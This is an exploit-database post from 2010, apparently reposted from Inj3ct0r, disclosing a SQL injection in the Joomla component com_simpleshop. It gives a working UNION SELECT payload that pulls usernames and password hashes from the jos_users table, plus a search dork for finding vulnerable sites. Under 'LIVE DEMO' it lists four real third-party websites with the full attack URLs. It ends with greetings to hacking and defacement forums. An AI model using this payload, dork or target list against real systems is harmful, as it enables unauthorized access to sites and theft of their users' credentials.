Home / os / win7

Joomla Component com_simpleshop SQL injection Vulnerability

Posted on 17 April 2010

===========================================================
Joomla Component com_simpleshop SQL injection Vulnerability 
===========================================================

# Exploit Title     : joomla component simpleshop SQL injection Vulnerability
# Date              : 17 april 2010
# Author            : Sudden_death (suddendeath404@yahoo.com)
# Software Link     : N/A
# Platform/Tested on: Windows XP 2 SP 2
# myweb             : http://suddendeath.000space.com/
# dork              : inurl:option=com_simpleshop
# Code                 : -1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
======================================================================
 
# EXPLOIT / c0de

-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
 
 
# VULN IN HERE
 
http://localhost/joomla/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=[c0de}
 
 
 
# LIVE DEMO
 
http://restrive.co.za/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://www.textusllc.com/site/index.php?option=com_simpleshop&task=browse&Itemid=92&catid=-3%20UNION%20SELECT%201,username,3,4,password,6,7,8%20from%20jos_users--
http://www.dpisb.com/cms/index.php?option=com_simpleshop&task=browse&Itemid=115&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
http://gfhomebrewing.com.au/index.php?option=com_simpleshop&task=browse&Itemid=31&catid=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--
 
[#]-------------------------------------------------------------------
 
GREETZ TO WE FORUM:
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ]
 
[#]-------------------------------------------------------------------
 
MY BROTHA :
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D |
 
[#]-------------------------------------------------------------------
 
note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!


# Inj3ct0r.com [2010-04-17]

 

TOP

Malware :

Exploits :